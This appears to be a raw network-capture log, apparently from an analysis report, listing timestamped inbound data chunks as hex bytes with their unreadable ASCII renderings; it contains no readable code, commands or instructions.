                                                                                                                  2023-08-29 17:16:42 UTC1468INData Raw: 31 1a 92 d0 03 65 22 13 31 44 73 d1 40 08 26 58 f5 4d 90 8e 69 b6 6f e0 6d c2 24 84 f5 49 68 de 92 70 1d cd e5 d9 08 a4 4a b6 af 74 40 ec 16 ec 35 45 73 dd ba 5c d5 fb 75 4b eb f3 92 2b 18 9c a7 4a 2d 59 45 17 29 59 1b 61 f1 66 b6 49 e7 2f c6 31 25 d2 1a 3c f1 d9 ce 87 b9 ed 71 a8 b8 36 e2 78 7d e4 80 79 7b c2 54 09 10 b1 57 71 6d d6 7f 8a 31 b1 57 ca e1 d1 30 5c 59 2f 33 59 e6 a6 49 18 08 c5 c7 a5 c8 c6 0b 69 1d 8e 86 89 0a 88 7d a1 93 70 46 48 14 fa 47 44 21 f3 d5 cb 81 ce c6 a5 31 c1 56 a1 db d3 25 59 09 80 c6 89 16 49 c6 ab 79 df 46 8b 92 08 f4 f2 cd d0 95 49 d8 2b 41 88 e3 d4 84 ab 99 d4 84 aa 1d 53 78 11 29 de 45 49 90 85 55 3d 5c 87 2f 49 10 89 76 89 94 ad 99 ba 19 7b c8 0c c1 80 c8 cf 8d d1 25 46 49 2f 30 5d de 95 9d 43 31 61 64 1a d9 f0 30 41 f1
                                                                                                                  Data Ascii: 1e"1Ds@&XMiom$IhpJt@5Es\uK+J-YE)YafI/1%<q6x}y{TWqm1W0\Y/3YIi}pFHGD!1V%YIyFI+ASx)EIU=\/Iv{%FI/0]C1ad0A
                                                                                                                  2023-08-29 17:16:42 UTC1472INData Raw: 30 62 92 a2 4d f8 19 d1 44 f9 19 cf 7c 33 15 a7 5f ca 39 aa 55 4b 6e c4 e4 42 64 ee 24 3e 0e de 15 a2 1c 98 42 ab 15 7b 4a 39 10 3f 49 99 15 60 7b c0 64 2c 3a 5b 09 d8 46 a0 a9 10 49 1a 92 8d 45 41 92 d3 ba 39 11 38 e7 57 1a b2 64 53 1b 71 60 d9 1a 86 ce 39 19 c0 cc 34 11 ae 01 c4 62 d0 41 c2 5e 2c c0 89 6d b1 45 c2 16 5b 94 ca fb d3 7e 49 c8 a5 13 ca 61 d4 45 37 19 80 94 a0 ef 11 44 3c 50 dd d4 4d 41 40 41 79 1b ed 7c 39 09 d0 30 76 e6 95 4d c0 5e d8 45 c2 5c d8 c6 8e 09 eb 00 49 15 ac fa c2 6f 94 ad df 51 06 bb b6 78 96 05 0d 9b 53 16 49 4f 38 e1 35 18 d0 c0 89 59 ac 52 8e 5c 2c 44 09 1e 3b 6f 5c ca f9 4d ea 0b d1 60 6f 42 5b 41 0c e5 ec 78 1f 94 95 4d 19 1d ba 47 49 0e e3 b3 a1 a8 3a 84 e8 1e ac 40 c2 6c d8 33 60 e9 4e 6f 14 b3 44 13 9c 1b 01 96 4b 1a
                                                                                                                  Data Ascii: 0bMD|3_9UKnBd$>B{J9?I`{d,:[FIEA98WdSq`94bA^,mE[~IaE7D<PMA@Ay|90vM^E\IoQxSIO85YR\,D;o\M`oB[AxMGI:@l3`NoDK
                                                                                                                  2023-08-29 17:16:42 UTC1476INData Raw: 1c c0 2b 3b 15 08 18 d0 38 3c 50 59 72 c2 13 91 45 46 ae d4 0e ca e1 91 31 49 16 53 bd 1a 6c d2 04 08 1c 93 4d a2 59 a9 51 08 58 17 45 4b 18 10 3a 72 16 a3 58 ca 7c d0 55 49 73 da c8 0c 09 80 8d c4 1d 9b e5 9e a1 c3 e5 5d f9 dc 41 8d 15 50 f8 0f 22 e7 37 e2 b8 51 45 d2 42 5b 00 c9 b1 19 4f 34 1a f0 03 56 20 d4 cc 34 11 f9 30 49 11 5d 1b 41 de 95 b9 4f 18 f1 26 0c 11 d3 86 19 92 1b 41 a1 85 50 53 ca da f0 ba 04 59 2c 30 a2 92 57 8d e9 18 59 27 cf 48 d0 ce ce d5 62 45 18 19 5a a1 ce c9 80 45 c1 9f 81 45 6b 24 f7 c6 67 98 21 44 71 0b f0 54 45 49 f0 ba 3c 9b d7 07 16 f2 e3 ce 1c 11 00 1c 49 09 e9 00 5d 6d c7 4a fe 1d de 23 a9 39 df 23 c0 13 92 c5 0b 5f 96 0a b6 54 c4 d5 4b 19 34 c0 b6 47 a5 42 03 53 54 fd 33 19 d3 23 ca 3b d0 d9 05 19 26 00 41 1b 87 ce b0 6d
                                                                                                                  Data Ascii: +;8<PYrEF1ISlMYQXEK:rX|UIs]AP"7QEB[O4V 40I]AO&APSY,0WY'HbEZEEk$g!DqTEI<I]mJ#9#_TK4GBST3#;&Am
                                                                                                                  2023-08-29 17:16:42 UTC1480INData Raw: 51 43 19 70 45 c2 c1 3b 66 48 1f 4b 45 4f f1 5b 9d 1a 98 d2 32 c9 1b d0 0b 49 11 d0 10 a1 e6 2f ae 4d 7f 53 85 6e 19 53 08 b5 e6 52 4c c9 0c f7 c9 01 1d 54 85 6c 9e 3c 85 59 da 38 57 cc 19 e0 87 5d 11 ec ce 88 92 f0 08 41 de d0 69 09 5e b6 ce 09 50 d4 23 c0 51 d4 0e 0d 92 50 00 41 7f 53 24 4d 19 90 6c 4b 03 d0 c3 4b 6c c4 23 c8 21 d0 ba b6 6c dd 4a fe 59 d2 43 2f 59 d5 85 45 58 d4 76 89 7f d0 7c 08 1d df d0 89 44 12 47 41 10 df 08 41 2a 10 7e 81 9d a4 50 0b 17 df 23 c8 20 90 4b cb 11 50 4f 4b 6d d2 f5 48 de da 05 88 7f 53 25 4d 19 d0 44 41 49 d0 82 49 2d 10 67 8a db d5 82 97 18 11 60 8a 1b 14 4d ca 11 ec c2 4c 5b bd 45 c2 6c d8 13 c2 c8 38 6f e9 e6 2f ba 8e 1b d1 42 c2 99 a9 75 0b 11 5b 87 c5 6e 72 58 c2 48 c0 4d c0 49 d8 f6 54 98 3c 21 4b 1b 30 2f 19 09
                                                                                                                  Data Ascii: QCpE;fHKEO[2I/MSnSRLTl<Y8W]Ai^P#QPAS$MlKKl#!lJYC/YEXv|DGAA*~P# KPOKmHS%MDAII-g`ML[El8o/Bu[nrXHMIT<!K0/
                                                                                                                  2023-08-29 17:16:42 UTC1484INData Raw: cc cc c5 61 5e c7 9c 91 47 f9 11 9f 4b 37 16 eb 67 4b 12 f4 4b 45 17 f9 87 4f 94 e4 3b c2 90 62 50 c9 a4 62 44 46 9c 8d 25 4d e9 93 06 c2 ea 73 52 2f 18 71 e7 8d 19 54 31 0c 0e c6 82 62 df 90 6a 5f c8 02 42 5b 32 6d 4d 5f 5e 10 03 42 11 45 00 4a 71 f1 83 cc 68 f8 c0 89 a9 eb 75 3d 11 5b c8 a8 18 10 04 04 e5 d2 cf 4b 1a e3 88 a1 03 2f 45 af 19 bb 07 b8 35 10 65 58 6d 20 46 42 88 d0 ce 1c 09 55 97 f1 1a 90 c5 49 99 a4 76 ca 3b d0 f7 7d 19 87 2f 4d 40 e3 9e f6 6d b0 58 79 69 23 e2 b9 a9 40 43 3c 99 d4 cc 43 f2 d5 fd 4b 69 d2 8d ca 23 d0 35 4e 18 81 85 d6 98 10 12 ef 2d d0 8c cb 5e db 35 4f ed b0 5b ca 19 f6 45 10 9a b6 41 49 9a 5c 23 41 53 1d fc 13 e6 c5 cd d8 1b d0 81 59 49 38 4d 01 e0 2f 43 14 7c d2 14 04 73 d6 1c 7a d9 80 ce b7 ea 7b 45 82 ab 10 44 cc 19
                                                                                                                  Data Ascii: a^GK7gKKEO;bPbDF%MsR/qT1bj_B[2mM_^BEJqhu=[K/E5eXm FBUIv;}/M@mXyi#@C<CKi#5N-^5O[EAI\#ASYI8M/C|sz{ED
                                                                                                                  2023-08-29 17:16:42 UTC1488INData Raw: 80 49 7e d0 cf 1a 4e e3 45 92 90 95 ad 7a d9 b6 7c 4d 04 38 45 27 7f 59 18 bd 94 d0 38 bf b2 b6 ee c0 54 3c 55 c0 44 20 fa 48 13 a5 49 1e 19 b8 41 48 19 d0 ba 5c 01 d3 45 02 98 b8 b5 23 18 83 16 c4 3d 95 b5 89 2b e0 55 08 33 d1 4a 4d 9c 4c 85 4c 4f e3 b3 c4 5c d0 a1 19 73 d4 ba 3c e9 2f 61 5c 35 50 43 21 f1 51 3b 5c ed d1 c4 2b d1 5b 00 ad 2a 02 b2 49 e8 96 c6 b7 1a b6 ce 4d 1b 85 c4 4f 7f 59 01 3c eb a2 55 83 20 8d b5 c9 07 2a 31 43 13 83 07 47 31 90 4b c2 6c 3c ba 49 1c 84 bf 72 69 53 83 23 11 86 ba 7c 58 d2 c8 0c ed 80 55 1e e6 c5 51 cb 50 a4 68 1f 11 2f 50 29 19 4b 7c 14 f1 a4 45 68 22 13 31 54 e6 a5 ad 49 59 90 ce 81 32 9d a9 f3 18 51 6e ca f0 ba 94 b0 32 01 45 1b 49 38 78 1e e2 2f 1b 2c 59 5e 1a 88 95 c9 ac 88 95 95 3c 88 19 e3 8c 8e 19 e8 f2 79 69
                                                                                                                  Data Ascii: I~NEz|M8E'Y8T<UD HIAH\E#=+U3JMLLO\s</a\5PC!Q;\+[*IMOY<U *1CG1Kl<IriS#|XUQPh/P)K|Eh"1TIY2Qn2EI8x/,Y^<yi
                                                                                                                  2023-08-29 17:16:42 UTC1492INData Raw: 30 9d 1b 8e b9 39 49 b2 40 c3 14 5a 40 16 bd d2 94 9e b9 d2 ca 4c 94 d5 03 9d 1b 73 ca 4c 9a d5 eb 59 98 d5 17 60 c9 d2 68 9d 1b a5 f6 4c 18 d4 58 b6 68 d4 82 48 c5 67 75 79 69 38 20 99 83 9d 51 ca 64 52 49 cf 0d a5 4d 8e 1f 38 c5 4b 09 a4 42 a1 15 70 41 a2 1c 38 67 b9 09 d3 cc 0f 11 70 42 c0 5f 7e 41 ab 3e df 4e 4a 12 c8 c4 41 0d 23 46 e0 bf e2 ad 93 e7 d3 51 b2 12 c4 24 4a 42 55 70 69 15 6e 45 4a 38 dc f7 68 6b 8d e9 8b 09 0b 47 1d 08 7e 01 4b 94 93 47 5a 3f c1 c5 60 f1 8d 54 c8 57 fc c0 1b d0 30 03 0f 1d 80 7d a9 a9 e3 c6 4d 7f fc 6e 63 4c dc c0 9b a1 d0 46 09 19 50 31 54 9a f2 55 49 92 99 49 b9 1b c3 c5 30 79 dc 45 3c 14 82 b7 41 49 ee a1 4e 4b ee 13 78 c0 fb 65 a2 1e 17 04 a9 39 19 62 71 69 df 6b 69 1b a0 4d 49 6d c1 7e 0f 31 a5 49 c4 09 9e b9 a1 d2
                                                                                                                  Data Ascii: 09I@Z@LsLY`hLXhHguyi8 QdRIM8KBpA8gpB_~A>NJA#FQ$JBUpinEJ8hkG~KGZ?`TW0}MncLFP1TUII0yE<AINKxe9bqikiMIm~1I
                                                                                                                  2023-08-29 17:16:42 UTC1496INData Raw: 45 1e da d3 ab 58 98 f0 e4 0f 52 a5 9e a2 62 80 46 cd 67 a6 07 4e 9a 13 bd 17 69 d7 07 1e f9 7f 81 a1 e0 70 d1 4a 92 08 8e a1 ac 81 2d ec 1a 63 e7 4a 6b d7 e5 a2 27 5d 00 95 e9 ba a9 c9 3a c1 35 5d c5 38 81 0b 1a 90 41 19 b9 5d 0e b1 f1 af 1c 4a 64 80 46 51 92 95 99 b9 19 d0 57 a1 92 a5 25 a5 22 27 30 07 88 d3 55 5b fd f8 ad ea 6d 62 ee 73 d9 03 3b 7c 59 5b 38 41 92 8d a1 69 1b 5d 01 35 26 20 04 8d f1 be e6 41 21 fb 01 45 09 c0 4d 58 77 fa 65 4c 5e 97 5d 02 6c 0c 25 a5 49 bc a9 c2 44 52 b5 19 cf ec 7e be 6d c5 65 61 0f 86 16 6f bb be 82 a9 07 a5 0d ca 71 ab 4d 49 b9 bb 06 e8 72 f2 2b d3 0d 2b bd e9 72 ab e5 22 4a 38 98 c3 0b f0 2b b6 a9 d3 64 ca 67 b2 47 92 0b be 27 4b 6a b2 47 5a 77 66 25 4b fa f9 55 8d f1 70 da 68 7b 30 ad 6d 07 6d 8d 90 c8 af d4 d2 69
                                                                                                                  Data Ascii: EXRbFgNipJ-cJk']:5]8A]JdFQW%"'0U[mbs;|Y[8Ai]5& A!EMXweL^]l%IDR~meaoqMIr++r"J8+dgG'KjGZwf%KUph{0mmi
                                                                                                                  2023-08-29 17:16:42 UTC1500INData Raw: be 4f f9 d0 31 51 98 2b 07 4e f8 d1 05 c8 e2 d9 a4 49 11 18 c4 b2 12 30 45 3c 29 f5 4e 09 13 c0 30 45 92 d1 64 45 4f 87 2d 4f 57 10 51 09 12 26 31 4a 90 8e 65 41 4f 87 2f 07 b8 f7 50 1d 19 c5 75 39 46 e3 85 12 f2 d0 40 f1 1c 90 45 c9 47 19 46 4c 5e 96 10 ca 3f d0 12 c2 e0 d8 ce 0e 1d 70 57 74 92 50 e9 68 58 c7 8d c8 f8 50 a5 49 9a 30 45 09 c8 39 46 89 12 18 cc 49 17 5b 0a 4d f1 43 45 b0 1b 2f e5 17 1f 51 4b 49 19 c0 8f 49 38 d2 e1 61 1b f0 45 a9 15 ff 18 41 9a 59 01 c9 05 d1 cc c8 55 91 e4 74 5c dc cc c8 49 d2 44 59 11 59 c4 1d 19 d1 ad 62 ef 2f 35 b6 44 12 49 40 88 90 6f 29 5d 87 cd c2 a7 98 24 7c 01 5b 03 08 0a 18 54 c4 51 d1 c5 19 15 b0 44 88 53 f1 44 26 22 17 cc cf 7b d4 42 ca 13 5e e4 45 1b f0 0a 92 ec 2f ba 0a 54 4b 83 59 1d 59 c4 11 dc c0 19 44 b8
                                                                                                                  Data Ascii: O1Q+NI0E<)N0EdEO-OWQ&1JeAO/Pu9F@EGFL^?pWtPhXPI0E9FI[MCE/QKII8aEAYUt\IDYYb/5DI@o)]$|[TQDSD&"{B^E/TKYYD
                                                                                                                  2023-08-29 17:16:42 UTC1504INData Raw: 0b 3d 03 d4 ad 1f b9 d2 7e 8e 6c c1 c4 43 97 f1 4d 49 99 53 23 40 a7 5a e6 c9 19 f1 6a 8a 89 bb 15 4e 6f e0 45 8b 96 e0 45 49 18 d2 47 7e 19 47 55 4b 48 b0 55 ca 67 d4 45 3c 13 f4 fd 4a c9 b1 ac 12 a8 5d 12 23 59 a4 1e 1a 94 ae 49 78 16 14 26 99 01 d0 4d c8 57 c0 44 7b 39 df c8 49 5c 2c 15 c0 06 38 d1 b7 18 e0 74 23 39 5d 03 6f 49 38 49 6f 19 20 59 39 67 90 94 b1 e6 d8 ba 3f 11 63 47 c9 df 96 60 40 59 83 0d 5f c9 f6 bd 23 43 87 55 b6 0c 8c 55 e9 19 9e 41 c2 d1 08 ad 33 d9 d3 16 23 49 de e5 37 19 7c 57 79 69 bb 85 5d 4e 51 c5 4a 90 96 5d b6 0c 9c 44 4a 19 9e 41 7a c2 93 4c 17 09 f4 ad 3a 89 d2 78 11 f9 de 39 4a 11 d9 1b 5d 69 d1 c6 07 09 de 01 a1 99 80 44 cd da a4 85 49 0d 58 47 e1 1d a2 45 41 b1 d2 37 49 18 44 4f 59 9a b6 59 49 b8 30 e4 e8 37 9e 41 23 1b
                                                                                                                  Data Ascii: =~lCMIS#@ZjNoEEIG~GUKHUgE<J]#YIx&MWD{9I\,8t#9]oI8Io Y9g?cG`@Y_#CUUA3#I7|Wyi]NQJ]DJAzL:x9J]iDIXGEA7IDOYYI07A#
                                                                                                                  2023-08-29 17:16:42 UTC1508INData Raw: 06 45 6d d7 45 7a d9 55 b3 46 8d 10 cd 49 5a d4 ae 4d df 93 41 48 11 2f 00 bd 48 d8 08 bd 9a 95 45 b1 15 eb 0d 41 16 5c 22 60 19 89 76 bf 48 ec 11 79 00 50 38 18 39 c6 54 bf 9e 42 57 3d bb ca b1 63 c3 80 cd 32 39 d6 4c 59 3d 2f 50 cb 05 6c 5f 23 1d 68 f1 28 29 eb 71 a3 64 f0 4a 90 78 da d4 7e 71 b4 4c c9 15 38 89 39 0d 55 85 10 6d 82 4e e9 6a 82 9e d9 bd 20 d5 e2 ef 99 65 0d 13 6f 64 0d f0 17 57 8e 90 40 1b 4d f1 23 75 6b 92 28 a5 c6 7d 5c e2 7b 18 38 ba 29 de d3 44 df 1c c2 9b 19 b8 d8 95 22 19 d0 76 49 ef e9 70 0d 34 ed 35 3c 91 92 fd f5 49 94 15 ea 55 10 45 0d f1 9a b5 3a 22 16 e6 c8 18 a4 cd 0d 71 78 c4 48 e6 c5 31 99 cf e5 05 48 51 01 47 5d 09 bd 35 49 e6 c5 4f ed 59 d1 cc fb 19 3b 5e c2 26 db 64 5c 89 0b 50 78 1b 5b bd 72 e7 d0 39 7e 92 95 b5 72 df
                                                                                                                  Data Ascii: EmEzUFIZMAH/HEA\"`vHyP89TBW=c29LY=/Pl_#h()qdJx~qL89UmNj eodW@M#uk(}\{8)D"vIp45<IUE:"qxH1HQG]5IOY;^&d\Px[r9~r
                                                                                                                  2023-08-29 17:16:42 UTC1512INData Raw: ad b0 81 ba 45 49 d9 c9 c4 2c 46 8e c0 12 40 10 7c a1 bd 90 60 08 4e 24 45 6b 40 9b 03 4f 98 92 84 c9 40 59 4d 8e 5e d1 40 49 00 d6 85 37 19 50 86 c2 59 7e 4d 0d 13 d3 40 c9 09 af 45 4c 15 59 4a 4d 5c dc 45 19 25 5b 10 41 9c d0 97 3c 00 f1 55 c2 48 d4 47 c0 99 44 14 4d 9c 02 31 4b 19 59 47 ca 20 d0 cc 08 1d 50 ae 51 4f 59 55 c2 6b 50 e2 c9 1d 59 07 4d 92 a0 41 c9 bc d0 47 c0 1f e9 54 17 6c d2 69 c0 18 18 7b 4f 0d eb 46 5d 01 f1 10 89 0b c1 85 47 08 50 56 4a d9 de c6 49 60 d4 45 c0 18 3b 52 1f 18 51 49 7b 90 e0 cc 4b 92 e0 44 c9 10 d3 cc 0f 1d e9 14 4d 01 8e 30 4a b9 dd a2 40 d8 17 45 5d d1 6d 45 66 79 d0 10 29 11 d0 44 af 38 5d 34 4d f2 d6 15 a1 09 85 e3 b1 e6 50 3e 7c 1e d0 6f 49 d9 cb aa e0 3b 81 e5 3e 15 53 45 88 1d 86 ce 78 9c 26 12 e9 90 9d b9 3d 2f
                                                                                                                  Data Ascii: EI,F@|`N$Ek@O@YM^@I7PY~M@ELYJM\E%[A<UHGDM1KYG PQOYUkPYMAGTli{OF]GPVJI`E;RQI{KDM0J@E]mEfy)D8]4MP>|oI;>SEx&=/
                                                                                                                  2023-08-29 17:16:42 UTC1516INData Raw: 4d b9 19 52 bd b9 19 29 7e 86 6d dd a5 4c ab a8 a5 4c 90 6e d4 4b d9 d0 e8 69 0d ea ae 48 9d b2 74 dc b8 eb b7 73 0d 5a 25 09 15 58 00 b5 fc ee 85 72 1e d9 a7 6c cd d0 96 70 f2 8d ce 44 4f b0 e5 7c 09 de 16 a0 11 96 a0 41 24 54 ce cf 08 d6 c0 89 65 e3 55 da 09 eb bd c2 d6 c0 4d 81 9c 19 0c 5b 10 d6 7e b8 11 28 12 29 1e 73 4e 99 55 d0 05 47 1a d9 ba 39 15 38 51 c8 f7 90 5a b6 89 8d 8b b6 6c 92 55 99 46 83 ba 5c 19 91 5d 12 91 19 87 59 6d e4 4d f1 34 a1 71 3d c9 81 65 45 e0 fc 38 19 b9 81 c8 4d 10 83 e5 1f 3c 20 65 3e 69 27 9b 41 90 a5 a9 4d 97 9f 25 a1 77 d0 4e b2 e6 e3 8c ca e1 2d 0d 46 8c 11 94 2e 92 11 65 41 14 59 d4 48 3c ec 04 38 90 95 b5 c9 1e 51 b5 49 e6 a5 b5 b6 0c 14 14 4a 11 1f ad 8c 59 d3 ce 04 11 98 45 be c1 ca 85 62 54 20 bb 49 d9 26 9d 23 19
                                                                                                                  Data Ascii: MR)~mLLnKiHtsZ%XrlpDO|A$TeUM[~()sNUG98QZlUF\]YmM4q=eE8M< e>i'AM%wN-F.eAYH<8QIJYEbT I&#
                                                                                                                  2023-08-29 17:16:42 UTC1520INData Raw: ac c4 39 f6 6d 7b d9 39 d7 3d 9f 51 34 7a cb d8 07 a2 0c 73 45 ca d3 2f ae 69 13 e3 85 a2 1d e1 f0 7a cb d8 ce 07 45 10 55 16 1a 12 0c 49 22 11 ce 99 65 d2 ce 98 19 55 97 34 1d e3 ba a2 11 05 b5 49 e1 20 45 b0 c9 d7 9a b9 0d 80 33 d9 15 df d0 88 99 54 31 46 58 b7 47 4f 19 d1 46 3c 1d 60 44 a2 19 d2 77 89 ef 08 5e 89 9a d0 a5 4a ef 09 5e 80 9a 31 45 69 12 11 48 49 1a d0 45 4d 49 87 f5 6e d7 38 00 be e6 88 ba f9 18 0d 28 ea 74 56 c7 4c 01 d6 46 c9 1c b0 45 45 93 09 4a dc 19 95 5e c3 4c cb b3 93 02 d0 97 ca fb f0 b3 92 02 0b c5 ca fa c0 4e 9a 98 1a c4 3b 58 90 a1 b3 6d 84 ce d7 c8 bf 2f 09 1b 8a 66 93 23 0a c5 89 4c d0 51 3d 59 eb 87 3c 31 53 45 34 09 d1 30 61 9d 19 31 89 13 50 38 52 19 a5 34 04 f9 f2 54 cd 9c 38 a9 9f 7b 9b 4d a2 f1 d1 37 4b 17 77 f9 49 4e
                                                                                                                  Data Ascii: 9m{9=Q4zsE/izEUI"eU4I E3T1FXGOF<`Dw^J^1EiHIEMIn8(tVLFEEJ^LN;Xm/f#LQ=Y<1SE40a1P8R4T8{M7KwIN
                                                                                                                  2023-08-29 17:16:42 UTC1524INData Raw: 49 3c 14 d0 49 19 f1 d8 c4 3b e1 51 4e 56 9a 2f 44 e9 6d 1c ba 3f 1d 10 2d 59 59 e7 41 b6 ce d0 40 69 9a ad 49 49 19 a5 41 cc d9 ac 53 ca df d0 49 c2 67 d8 c0 b6 6c 6a 49 f1 1b 91 5e 8a 5f 8f 1b 12 44 f4 87 59 51 f9 ba 3c d9 5e 4d 21 3b 5c 45 09 48 38 01 09 3b 8d 87 d3 11 5a 42 59 d9 b2 45 40 f1 1e 87 4f 1f dc 8d 07 9a 9d 82 0f 1d d1 45 29 19 10 ad cb e0 50 c6 cf 49 d8 25 c2 d7 8e ac 51 59 58 4e 18 d9 d0 41 19 e6 c5 91 5b 29 a0 44 c2 53 86 ce 3c 11 87 c8 0f bc d1 42 99 19 d7 ce b1 99 fd 48 89 52 d0 4c c2 1f ba 44 c2 d7 2f 05 19 05 5b 82 16 47 1d 49 b8 1d 38 30 89 3d 26 00 41 18 a4 45 4e 4f 38 55 6e 19 d0 1c 2a 19 be 0e 40 98 3c dd c8 ab 90 00 1f 11 df c1 b3 1b b2 59 cc ef df 51 cd f6 50 47 1a 18 6f ce 16 31 f0 c0 92 16 54 9c 89 1a ba 45 c1 94 5d 2d 09 0d
                                                                                                                  Data Ascii: I<I;QNV/Dm?-YYA@iIIASIgljI^_DYQ<^M!;\EH8;ZBYE@OE)PI%QYXNA[)DS<BHRLD/[GI80=&AENO8Un*@<YQPGo1TE]-
                                                                                                                  2023-08-29 17:16:42 UTC1528INData Raw: 99 49 13 5a 03 41 ef d0 9d 52 d9 f5 be f6 e6 af e3 4c f8 dc a5 bf 60 c6 c4 4c 71 50 40 25 90 ee c7 4b bb d0 3b d9 51 f0 2f 80 1a 95 7c f9 5f 53 23 51 19 86 ba 8d 0c 34 a5 48 92 16 1b 91 23 60 44 49 94 9e 01 a1 f4 21 ba b6 19 26 00 41 18 a4 42 1f f1 bc 7a 5b b9 c4 15 4b 44 27 c7 19 1b 3b 45 5a 92 9e 5d cc d0 5b 44 49 90 96 5d 3d 1e ba 44 a1 1b 6d 15 57 9a ae 5d 49 6c 37 88 c9 1c 30 c5 4c 7d d5 ac 84 99 d1 d7 49 19 ba 41 f1 f6 b3 7c 39 f1 d2 0c f9 00 5b bc 1e 2a 0b ba cd 0c 3c 44 41 6e c8 ae 5c d9 c9 6d c4 5f d4 f5 55 dd 20 4a cc d9 d0 1c 10 6d d8 ce 7f 9c 26 45 3c fe 3b 42 c4 47 94 c0 59 c2 a5 18 21 38 9e ad 4a 6b d1 b4 38 40 59 30 b9 9a b5 b9 e9 19 55 b3 3d 13 31 4f 65 f9 da 45 a2 1b e3 b3 ca 54 2c ba cc 29 d1 74 69 1a 5b 8e a1 70 e0 5b 48 19 9b 48 23 18
                                                                                                                  Data Ascii: IZARL`LqP@%K;Q/|_S#Q4H#`DI!&ABz[KD';EZ][DI]=DmW]Il70L}IA|9[*<DAn\m_U Jm&E<;BGY!8Jk8@Y0U=1OeET,)ti[p[HH#
                                                                                                                  2023-08-29 17:16:42 UTC1532INData Raw: 35 4b dd 9a e5 49 f9 01 d6 c4 5c f2 a1 69 02 d8 ad 84 29 b2 cc 0c 59 0c ba 3c fd 5b 70 68 7f 2f 47 9f 7b 9a ba 3c f9 2f 93 ca 95 14 59 cb 52 2b 7c 95 f1 fa a4 6a 54 b0 43 cc e8 b5 02 c7 f1 83 35 48 ee 50 9d 52 d9 27 9d 10 51 b3 44 1c c9 c4 a5 d1 0c 0c fd 49 c1 68 45 9d be 66 45 46 19 62 7a 74 b9 02 1b 64 eb 08 45 41 9a 34 bd 94 05 f4 b7 09 16 fc 41 6d d0 13 f0 48 08 d0 c6 a5 1d 09 79 6d 41 b6 45 ca f9 af 23 ca e1 af 31 4b ca 12 47 69 9a 34 b5 90 d9 d0 9c 1d 3d c8 9a 35 3d c0 73 96 d9 cb 05 0a 01 11 59 69 53 ec 9b 49 f0 55 97 30 07 09 59 6d 39 5b 49 6d 98 21 a5 44 99 51 07 88 59 dc 3a ca c9 d0 25 4b 0d b0 c6 9b 19 3b 69 9d 18 a3 44 91 38 a3 44 93 19 3b 51 c8 19 27 87 c8 48 d1 30 f1 c0 8c 61 51 28 d0 44 bd bb 81 c8 05 3d d8 6e 81 19 53 a4 46 1a 11 5e 80 12
                                                                                                                  Data Ascii: 5KI\i)Y<[ph/G{</YR+|jTC5HPR'QDIhEfEFbztdEA4AmHymAE#1KGi4=5=sYiSIU0Ym9[Im!DQY:%K;iD8D;Q'H0aQ(D=nSF^
                                                                                                                  2023-08-29 17:16:42 UTC1536INData Raw: a1 90 58 c0 9c 14 f1 90 9c 08 0d 09 18 a5 19 de 9c 4d 44 08 47 58 c5 09 04 69 c0 d0 18 a9 c0 95 a1 91 54 dc 45 90 5c 20 9d 04 11 0e 84 61 c1 95 9d 0b 0c 24 05 4a c0 95 d3 a1 59 d6 84 4d c5 d1 5d 0c e1 12 41 4b f5 14 41 a9 c0 89 65 ca 78 70 61 b7 d0 12 4d 83 30 c8 04 68 e6 10 5a 09 38 10 5a 09 38 d0 6e 09 38 10 5a 09 38 fb 85 56 59 f1 b5 8d 0e c9 81 5d 40 d4 22 c8 28 d1 47 8d 05 09 1c 49 3d d1 5f 90 b5 89 55 0b 3f d0 47 5d 19 cb b9 44 02 d1 05 6c 11 86 ce b8 f1 cf 7e 55 19 d0 04 53 99 05 04 48 11 38 5f c6 1b d4 c5 5a 19 f0 07 48 d9 09 a5 08 1b 7a 43 08 06 96 07 01 5f 92 0d 0f 5b 98 4f 0f 5b 98 03 0b 51 95 a1 90 d8 dc 9b 80 99 cd 04 5a d9 0e 8f 90 39 1a 9b 88 c0 ce 45 6f c0 12 e8 c8 1c 24 c4 48 59 d4 1b 49 34 3c 05 4e 1d 95 bd c8 12 0e 87 90 d0 09 bb 17 59
                                                                                                                  Data Ascii: XMDGXiTE\ a$JYM]AKAexpaM0hZ8Z8n8Z8VY]@"(GI=_U?G]Dl~USH8_ZHzC_[O[QZ9Eo$HYI4<NY
                                                                                                                  2023-08-29 17:16:42 UTC1540INData Raw: 15 1a f1 f4 13 cf b8 91 51 19 58 99 ba 3c 11 2c ad f8 79 b3 ce 91 9c 0b 45 35 75 96 c6 8e 09 eb 30 c9 e1 ac 8b 88 ff d4 46 89 94 d0 33 4d 92 9e 49 c2 1f 81 5d c2 54 24 a5 0d 19 78 4d a1 62 d2 b9 09 7b 96 4d a2 59 f1 18 f9 11 e9 18 59 59 dc 44 51 1d b0 35 49 67 d8 ce 17 e5 80 15 1e 31 38 b3 cc fa db 12 49 15 2c ad eb 4a 75 4e 47 e6 95 85 57 11 b0 50 c9 22 95 55 35 d7 5b 86 2b 96 53 c0 93 bd 96 13 23 18 b8 d5 68 87 cb 01 16 d8 5d fa 88 94 d5 01 b6 2c 8c 0f 97 7f ba 55 99 1b d4 55 69 00 18 cd b6 4b d4 84 00 9a 70 45 a9 19 4a 45 55 5c eb 65 27 0c 95 01 9b 17 52 1c 19 1b 38 39 c9 39 d0 41 4f 69 c5 cc 75 51 d4 8e 48 59 db 95 69 49 b6 b4 c0 1b 6e 34 18 92 90 4d 01 6d bd 4d 01 6d d7 77 68 f2 b8 ce 54 93 24 85 7d 4e d0 45 8e 9f 58 b5 48 1b d2 b4 42 ca eb 82 c0 5f
                                                                                                                  Data Ascii: QX<,yE5u0F3MI]T$xMb{MYYYDQ5Ig18I,JuNGWP"U5[+S#h],UUiKpEJEU\e'R899AOiuQHYiIn4MmMmwhT$}NEXHB_
